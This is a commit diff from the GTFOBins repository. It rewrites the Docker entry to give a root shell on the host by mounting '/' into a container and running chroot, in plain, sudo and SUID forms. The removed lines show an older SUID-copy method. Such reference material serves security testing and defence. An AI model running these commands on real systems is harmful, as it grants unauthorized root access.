1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Simplify the docker example by using chroot

Also make it available for non-root users.

The previous SUID example had the problem that the loaders between host and
containers must match, for example, copying `sh` from alpine to debian doesn't
directly work.
This commit is contained in:
Andrea Cardaci 2019-07-02 14:55:40 +02:00
parent f4a3fc9af3
commit 40ecb11b2e

@ -1,13 +1,14 @@
---
description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
This requires the user to be privileged enough to run docker, i.e. being in the `docker` group or being `root`.
functions:
shell:
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: docker run -v /:/mnt --rm -it alpine chroot /mnt sh
sudo:
- code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
suid:
- code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
- description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell.
code: ./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
---